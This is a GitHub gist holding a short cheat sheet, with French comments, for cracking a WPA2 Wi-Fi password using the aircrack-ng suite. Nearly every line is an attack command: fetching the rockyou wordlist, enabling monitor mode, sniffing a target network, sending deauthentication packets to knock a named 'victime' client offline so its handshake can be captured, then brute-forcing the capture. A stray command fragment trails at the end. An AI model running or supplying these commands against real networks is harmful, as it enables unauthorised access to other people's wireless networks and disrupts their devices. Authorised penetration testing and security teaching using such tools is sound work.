Skip to content

Instantly share code, notes, and snippets.

@rzdhop
Last active December 23, 2018 12:59
Show Gist options
  • Save rzdhop/8f8d3751084109f947021541ea94393b to your computer and use it in GitHub Desktop.
Save rzdhop/8f8d3751084109f947021541ea94393b to your computer and use it in GitHub Desktop.
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
#telecharger un dico
airmon-ng start wlp0s20f3
#mettre en monitor mode
airmon-ng check kill
airodump-ng mon0
#lancer un listener de reseaux
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 mon0
#-c <channel> | pr voir MAC_victime
aireplay-ng --deauth 100 -a 6C:38:A1:5E:73:68 -c E4:A7:C5:1A:18:61 mon0
#-0 2 (nb de deauth packet) -a <MAC_reseau> -c <Mac_victime>
airodump-ng --write CrackKaido --channel 6 --bssid 6C:38:A1:5E:73:68 mon0
#-c <CH> --bssid <bssid> -w <Nomdufichier.cap>
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
# -a2 (pour WPA2) -b <bssid> -w <dico> <fichier.cap>
-a 6C:38:A1:5E:73:68 mon0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment